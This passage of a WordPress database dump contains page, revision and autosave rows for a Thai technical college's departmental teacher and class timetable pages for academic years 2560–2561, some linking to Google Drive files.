(2267, 4, '2018-05-06 22:37:10', '2018-05-06 15:37:10', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการเลขานุการ/การจัดการสำนักงาน', '', 'inherit', 'closed', 'closed', '', '2266-revision-v1', '', '', '2018-05-06 22:37:10', '2018-05-06 15:37:10', '', 2266, 'http://www.technicrayong.ac.th/2266-revision-v1/', 0, 'revision', '', 0),
(2270, 4, '2018-05-06 22:37:54', '2018-05-06 15:37:54', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1LZOFp212g4OhdfRGvzcH1FTZ3cVpUuZh\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาคอมพิวเตอร์ธุรกิจ', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%84%e0%b8%ad%e0%b8%a1%e0%b8%9e%e0%b8%b4%e0%b8%a7%e0%b9%80%e0%b8%95%e0%b8%ad', '', '', '2018-05-15 04:35:21', '2018-05-14 21:35:21', '', 0, 'http://www.technicrayong.ac.th/?page_id=2270', 0, 'page', '', 0),
(2271, 4, '2018-05-06 22:37:54', '2018-05-06 15:37:54', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาคอมพิวเตอร์ธุรกิจ', '', 'inherit', 'closed', 'closed', '', '2270-revision-v1', '', '', '2018-05-06 22:37:54', '2018-05-06 15:37:54', '', 2270, 'http://www.technicrayong.ac.th/2270-revision-v1/', 0, 'revision', '', 0),
(2274, 4, '2018-05-06 22:39:01', '2018-05-06 15:39:01', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1cVm3D-1GKp9tuOifM3m1hZaezrOgV0Ta\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการจัดการโลจิสติกส์', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-15 04:41:02', '2018-05-14 21:41:02', '', 0, 'http://www.technicrayong.ac.th/?page_id=2274', 0, 'page', '', 0),
(2275, 4, '2018-05-06 22:39:01', '2018-05-06 15:39:01', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการจัดการโลจิสติกส์', '', 'inherit', 'closed', 'closed', '', '2274-revision-v1', '', '', '2018-05-06 22:39:01', '2018-05-06 15:39:01', '', 2274, 'http://www.technicrayong.ac.th/2274-revision-v1/', 0, 'revision', '', 0),
(2278, 4, '2018-05-06 22:40:09', '2018-05-06 15:40:09', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1zM15kJiJTh4hk690TAIcWuUB6w7gxyXp\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาคหกรรมศาสตร์', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%84%e0%b8%ab%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%a8%e0%b8%b2%e0%b8%aa', '', '', '2018-05-15 04:36:52', '2018-05-14 21:36:52', '', 0, 'http://www.technicrayong.ac.th/?page_id=2278', 0, 'page', '', 0),
(2279, 4, '2018-05-06 22:40:09', '2018-05-06 15:40:09', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาคหกรรมศาสตร์', '', 'inherit', 'closed', 'closed', '', '2278-revision-v1', '', '', '2018-05-06 22:40:09', '2018-05-06 15:40:09', '', 2278, 'http://www.technicrayong.ac.th/2278-revision-v1/', 0, 'revision', '', 0),
(2282, 4, '2018-05-06 22:41:11', '2018-05-06 15:41:11', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1y0O7XIS34C2eUX3_ga4kzcYMNzqsIjdY\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาอาหารและโภชนาการ', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%ad%e0%b8%b2%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b9%82', '', '', '2018-05-15 04:33:45', '2018-05-14 21:33:45', '', 0, 'http://www.technicrayong.ac.th/?page_id=2282', 0, 'page', '', 0),
(2283, 4, '2018-05-06 22:41:11', '2018-05-06 15:41:11', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาอาหารและโภชนาการ', '', 'inherit', 'closed', 'closed', '', '2282-revision-v1', '', '', '2018-05-06 22:41:11', '2018-05-06 15:41:11', '', 2282, 'http://www.technicrayong.ac.th/2282-revision-v1/', 0, 'revision', '', 0),
(2286, 4, '2018-05-06 22:42:41', '2018-05-06 15:42:41', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1WbH942zCtIGYtEoJvKeABxvxYMSdCZ5u\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการท่องเที่ยว', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%97', '', '', '2018-05-19 11:18:38', '2018-05-19 04:18:38', '', 0, 'http://www.technicrayong.ac.th/?page_id=2286', 0, 'page', '', 0),
(2287, 4, '2018-05-06 22:42:41', '2018-05-06 15:42:41', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการท่องเที่ยว', '', 'inherit', 'closed', 'closed', '', '2286-revision-v1', '', '', '2018-05-06 22:42:41', '2018-05-06 15:42:41', '', 2286, 'http://www.technicrayong.ac.th/2286-revision-v1/', 0, 'revision', '', 0),
(2290, 4, '2018-05-06 22:43:46', '2018-05-06 15:43:46', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1W_aeZtZ02lsXu4MWnGPYupgwbuVAZ-4x\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการโรงแรม', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%81%e0%b8%a3%e0%b8%a1', '', '', '2018-05-15 04:31:14', '2018-05-14 21:31:14', '', 0, 'http://www.technicrayong.ac.th/?page_id=2290', 0, 'page', '', 0),
(2291, 4, '2018-05-06 22:43:46', '2018-05-06 15:43:46', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกวิชาการโรงแรม', '', 'inherit', 'closed', 'closed', '', '2290-revision-v1', '', '', '2018-05-06 22:43:46', '2018-05-06 15:43:46', '', 2290, 'http://www.technicrayong.ac.th/2290-revision-v1/', 0, 'revision', '', 0),
(2294, 4, '2018-05-06 22:44:39', '2018-05-06 15:44:39', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1yhWxgG2BObpsRSiURW2iSvg3IlxAMAWv\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางสาขาวิชาเทคโนโลยีสารสนเทศ', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%aa%e0%b8%b2%e0%b8%82%e0%b8%b2%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b9%82%e0%b8%99%e0%b9%82%e0%b8%a5%e0%b8%a2%e0%b8%b5', '', '', '2018-05-17 06:30:34', '2018-05-16 23:30:34', '', 0, 'http://www.technicrayong.ac.th/?page_id=2294', 0, 'page', '', 0),
(2295, 4, '2018-05-06 22:44:39', '2018-05-06 15:44:39', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางสาขาวิชาเทคโนโลยีสารสนเทศ', '', 'inherit', 'closed', 'closed', '', '2294-revision-v1', '', '', '2018-05-06 22:44:39', '2018-05-06 15:44:39', '', 2294, 'http://www.technicrayong.ac.th/2294-revision-v1/', 0, 'revision', '', 0),
(2298, 4, '2018-05-06 22:45:31', '2018-05-06 15:45:31', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาวิทยาศาสตร์', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95', '', '', '2018-05-06 22:45:31', '2018-05-06 15:45:31', '', 0, 'http://www.technicrayong.ac.th/?page_id=2298', 0, 'page', '', 0),
(2299, 4, '2018-05-06 22:45:31', '2018-05-06 15:45:31', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาวิทยาศาสตร์', '', 'inherit', 'closed', 'closed', '', '2298-revision-v1', '', '', '2018-05-06 22:45:31', '2018-05-06 15:45:31', '', 2298, 'http://www.technicrayong.ac.th/2298-revision-v1/', 0, 'revision', '', 0),
(2300, 4, '2018-05-06 22:45:35', '2018-05-06 15:45:35', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาวิทยาศาสตร์', '', 'inherit', 'closed', 'closed', '', '2298-autosave-v1', '', '', '2018-05-06 22:45:35', '2018-05-06 15:45:35', '', 2298, 'http://www.technicrayong.ac.th/2298-autosave-v1/', 0, 'revision', '', 0),
(2302, 4, '2018-05-06 22:46:25', '2018-05-06 15:46:25', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาคณิตศาสตร์', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%84%e0%b8%93%e0%b8%b4%e0%b8%95%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3', '', '', '2018-05-06 22:46:25', '2018-05-06 15:46:25', '', 0, 'http://www.technicrayong.ac.th/?page_id=2302', 0, 'page', '', 0),
(2303, 4, '2018-05-06 22:46:25', '2018-05-06 15:46:25', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาคณิตศาสตร์', '', 'inherit', 'closed', 'closed', '', '2302-revision-v1', '', '', '2018-05-06 22:46:25', '2018-05-06 15:46:25', '', 2302, 'http://www.technicrayong.ac.th/2302-revision-v1/', 0, 'revision', '', 0),
(2304, 4, '2018-05-06 22:46:29', '2018-05-06 15:46:29', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาคณิตศาสตร์', '', 'inherit', 'closed', 'closed', '', '2302-autosave-v1', '', '', '2018-05-06 22:46:29', '2018-05-06 15:46:29', '', 2302, 'http://www.technicrayong.ac.th/2302-autosave-v1/', 0, 'revision', '', 0),
(2306, 4, '2018-05-06 22:47:26', '2018-05-06 15:47:26', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาภาษาต่างประเทศ', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b8%ab%e0%b8%a1%e0%b8%a7%e0%b8%94%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%a0%e0%b8%b2%e0%b8%a9%e0%b8%b2%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%9b', '', '', '2018-05-06 22:47:26', '2018-05-06 15:47:26', '', 0, 'http://www.technicrayong.ac.th/?page_id=2306', 0, 'page', '', 0),
(2307, 4, '2018-05-06 22:47:26', '2018-05-06 15:47:26', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาภาษาต่างประเทศ', '', 'inherit', 'closed', 'closed', '', '2306-revision-v1', '', '', '2018-05-06 22:47:26', '2018-05-06 15:47:26', '', 2306, 'http://www.technicrayong.ac.th/2306-revision-v1/', 0, 'revision', '', 0),
(2308, 4, '2018-05-06 22:47:34', '2018-05-06 15:47:34', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางหมวดวิชาภาษาต่างประเทศ', '', 'inherit', 'closed', 'closed', '', '2306-autosave-v1', '', '', '2018-05-06 22:47:34', '2018-05-06 15:47:34', '', 2306, 'http://www.technicrayong.ac.th/2306-autosave-v1/', 0, 'revision', '', 0),
